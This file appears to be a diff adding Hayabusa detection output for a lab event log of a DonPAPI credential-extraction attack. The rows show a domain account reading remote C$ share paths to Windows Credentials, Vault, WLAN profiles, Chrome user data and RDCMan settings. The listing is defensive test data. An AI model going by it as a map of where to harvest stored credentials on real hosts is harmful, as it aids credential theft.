+2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.765 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.765 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.765 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.765 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Wlansvc\Profiles\Interfaces | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.765 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.780 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.796 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.796 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.796 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.813 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.815 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\Policy.vpol | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.702 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.717 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.717 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.735 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.735 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.735 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.750 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.750 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.750 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\system32\config\systemprofile\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.750 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.750 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.813 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.813 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.813 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.813 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.813 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.813 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.830 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.832 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
